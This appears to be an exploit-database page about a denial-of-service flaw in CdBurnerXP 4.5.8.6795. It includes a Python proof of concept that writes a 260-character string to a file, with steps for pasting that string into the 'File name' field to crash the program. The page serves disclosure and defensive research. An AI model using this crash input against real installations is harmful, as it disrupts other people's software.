CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)

vendor:

CdBurnerXP

by:

Alan Baeza

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: CdBurnerXP

Affected Version From: 4.5.8.6795

Affected Version To: 4.5.8.6795

Patch Exists: NO

Related CWE: N/A

CPE: a:cdburnerxp:cdburnerxp:4.5.8.6795

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64 es

2018

CdBurnerXP 4.5.8.6795 – ‘File Name’ Denial of Service (PoC)

CdBurnerXP 4.5.8.6795 is vulnerable to a denial of service attack when a maliciously crafted file name is pasted into the 'File Name' field. This causes the application to crash.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
# Discovery by: Alan Baeza
# Discovery Date: 2018-09-13
# Vendor Homepage: https://cdburnerxp.se/
# Software Link: https://cdburnerxp.se/downloadsetup.exe
# Tested Version: 4.5.8.6795
# Tested on OS  : Windows 10 Pro x64 es

#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS: 
# 1.- Run python code : python dos.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open CdBurnerXP
# 4.- Select option "Copy or grab disc"
# 5.- Select checkbox target "Hard disk"
# 6.- Paste ClipBoard on "File name"
# 7.- Clic Copy disc
# 8.- DoS

import socket, os, sys

buffer = "\x41" * 260

f = open ("generate.txt", "w")
f.write(buffer)
f.close()